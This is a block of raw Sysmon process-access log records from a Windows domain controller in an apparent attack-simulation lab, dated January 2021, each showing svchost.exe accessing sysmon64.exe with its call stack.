13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.923{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.908{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 